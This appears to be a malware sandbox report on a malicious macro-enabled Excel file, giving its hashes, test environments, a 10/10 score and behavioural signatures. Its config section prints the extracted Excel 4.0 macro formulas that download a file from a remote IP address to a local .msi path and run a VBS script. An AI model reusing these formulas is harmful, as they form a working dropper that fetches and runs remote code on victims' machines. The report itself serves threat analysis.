General
-
Target
f7e99cc1710ebefc340098c8d5d01d09_JaffaCakes118
-
Size
6KB
-
Sample
240418-nsqa4sbg36
-
MD5
f7e99cc1710ebefc340098c8d5d01d09
-
SHA1
796ba003315a271f20e77076212fe0b0d7f30853
-
SHA256
f9c30383c481ca29a36b47d1fe4a935392544cc10136ba64d8b0c9b36992d915
-
SHA512
5ca0207a30b8548830f8a7782416a23bbb382521d21931aba3e4dbef28b9b29fc94a04151368defd647e4b8b447474cb099a582222e12862f372220135c98b6f
-
SSDEEP
192:NDSeuScbrA2OmmfRv8UhHFBFYuBb98yTK+Z:NJupM2w11FY8b98yTp
Static task
static1
Behavioral task
behavioral1
Sample
f7e99cc1710ebefc340098c8d5d01d09_JaffaCakes118.xlsm
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
f7e99cc1710ebefc340098c8d5d01d09_JaffaCakes118.xlsm
Resource
win10v2004-20240412-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
f7e99cc1710ebefc340098c8d5d01d09_JaffaCakes118
-
Size
6KB
-
MD5
f7e99cc1710ebefc340098c8d5d01d09
-
SHA1
796ba003315a271f20e77076212fe0b0d7f30853
-
SHA256
f9c30383c481ca29a36b47d1fe4a935392544cc10136ba64d8b0c9b36992d915
-
SHA512
5ca0207a30b8548830f8a7782416a23bbb382521d21931aba3e4dbef28b9b29fc94a04151368defd647e4b8b447474cb099a582222e12862f372220135c98b6f
-
SSDEEP
192:NDSeuScbrA2OmmfRv8UhHFBFYuBb98yTK+Z:NJupM2w11FY8b98yTp
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-